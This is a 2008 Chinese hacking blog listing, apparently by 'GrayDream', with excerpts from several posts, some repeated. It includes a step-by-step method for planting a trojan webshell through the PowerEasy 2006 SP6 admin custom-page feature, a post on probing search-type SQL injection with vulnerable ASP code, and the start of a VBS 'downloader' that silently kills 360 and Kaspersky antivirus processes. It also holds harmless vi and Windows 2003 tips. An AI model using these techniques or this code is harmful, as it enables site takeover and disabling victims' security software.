View Mode: Normal | Article List
动易2006后台拿Webshell方法
[ 2008-06-07 10:23:28 | Author: GrayDream ]
针对版本:PowerEasy2006 SP6
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认,不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/muma.asp.“文件名称”即输入生成的木马的文件名。建议起的有诱惑力一些。“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。选择“自定义页面管理首页”,点击右边出现的“生成本页”。就OK 了。至此,成功获得动易2006SP6的Webshell
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认,不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/muma.asp.“文件名称”即输入生成的木马的文件名。建议起的有诱惑力一些。“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。选择“自定义页面管理首页”,点击右边出现的“生成本页”。就OK 了。至此,成功获得动易2006SP6的Webshell
Linux下VI使用收藏
[ 2008-04-12 17:10:27 | Author: GrayDream ]
vi的使用之汇总
功能最强在的编辑器——vi
vi是所有UNIX系统都会提供的屏幕编辑器,它提供了一个视窗设备,通过它可以编辑文件。当然,对UNIX系统略有所知的人,或多或少都觉得vi超级难用,但vi是最基本的编辑器,所以希望读者能好好把它学起来,以后在UNIX世界里必将畅行无阻、游刃有余,因为其他几种文本处理器并非UNIX标准配备。说不定别人的Linux机器没安装joe或pico,如果您不会vi,那您可能就没辄了。
vi的基本概念
基本上vi可分为三种操作状态,分别是命令模式(Command mode)、插入模式(Insert mode)和底线命令模式(Last line mode),各模式的功能区分如下:
1. Comand mode:控制屏幕光标的移动,字符或光标的删除,移动复制某区段及进入Insert mode下,或者到Last line mode。
...
Read More...
功能最强在的编辑器——vi
vi是所有UNIX系统都会提供的屏幕编辑器,它提供了一个视窗设备,通过它可以编辑文件。当然,对UNIX系统略有所知的人,或多或少都觉得vi超级难用,但vi是最基本的编辑器,所以希望读者能好好把它学起来,以后在UNIX世界里必将畅行无阻、游刃有余,因为其他几种文本处理器并非UNIX标准配备。说不定别人的Linux机器没安装joe或pico,如果您不会vi,那您可能就没辄了。
vi的基本概念
基本上vi可分为三种操作状态,分别是命令模式(Command mode)、插入模式(Insert mode)和底线命令模式(Last line mode),各模式的功能区分如下:
1. Comand mode:控制屏幕光标的移动,字符或光标的删除,移动复制某区段及进入Insert mode下,或者到Last line mode。
...
Read More...
搜索型注入的基本判断
[ 2008-04-09 11:53:44 | Author: GrayDream ]
很早的时候就已经流行开来了。只是又有朋友总是问我,如何进行搜索型的注入,该填写什么注入语句进行测试。今天就再记录一下。
既然是搜索型注入,肯定首先是要找网页中具有搜索的地方。一般如果他的ASP文件如下所示,就可以进行提交注入语句了:
Read More...
既然是搜索型注入,肯定首先是要找网页中具有搜索的地方。一般如果他的ASP文件如下所示,就可以进行提交注入语句了:
<%
key = request("key")
otype = request("otype")
if key = "" then
response.write "<scrfipt>alert('查询字符串不能为空!');history.back();</script>"
resopnse.end
end if
%>
……(省略中间代码)
<%
Set rs = Server.CreateObject("ADODB.Recordset")
if otype = "title" then
...key = request("key")
otype = request("otype")
if key = "" then
response.write "<scrfipt>alert('查询字符串不能为空!');history.back();</script>"
resopnse.end
end if
%>
……(省略中间代码)
<%
Set rs = Server.CreateObject("ADODB.Recordset")
if otype = "title" then
Read More...
Windows2003系统开机服务出错的解决办法
[ 2008-03-17 22:40:39 | Author: GrayDream ]
经常见论坛中有人问如何解决每次Windows2003系统启动后总是有一个烦人的出错提示的问题。其实要解决这个也并不难。方法也不单一
你可以直接打开Windows的日志事件查看器,查看出错的日志。然后找到相应的服务将他关闭(如果可以)并且禁用。当然也可以采用另外一种方法,就是找到注册表中的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows下,然后再它下面新建一个Dword类型的键值,命名为“NoPopUpsOnBoot”并设置其16进制值为1。然后下次重新启动后就不会弹出那个讨厌的提示对话框了。
你可以直接打开Windows的日志事件查看器,查看出错的日志。然后找到相应的服务将他关闭(如果可以)并且禁用。当然也可以采用另外一种方法,就是找到注册表中的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows下,然后再它下面新建一个Dword类型的键值,命名为“NoPopUpsOnBoot”并设置其16进制值为1。然后下次重新启动后就不会弹出那个讨厌的提示对话框了。
功能超强大的VBS下载者
[ 2008-03-13 19:22:31 | Author: GrayDream ]
On Error Resume Next
nowdate=date()
Set ws=CreateObject("Wscript.Shell")
Set WMIs=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set Proc=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name='360tray.exe'")
If Proc.Count<>0 Then
ws.run "cmd /c taskkill /f /im 360tray.exe",vbhide
End If
kkkbbb="avp.exe"
Set Proavp=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name="&kkkbbb)
...nowdate=date()
Set ws=CreateObject("Wscript.Shell")
Set WMIs=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set Proc=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name='360tray.exe'")
If Proc.Count<>0 Then
ws.run "cmd /c taskkill /f /im 360tray.exe",vbhide
End If
kkkbbb="avp.exe"
Set Proavp=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name="&kkkbbb)
Read More...
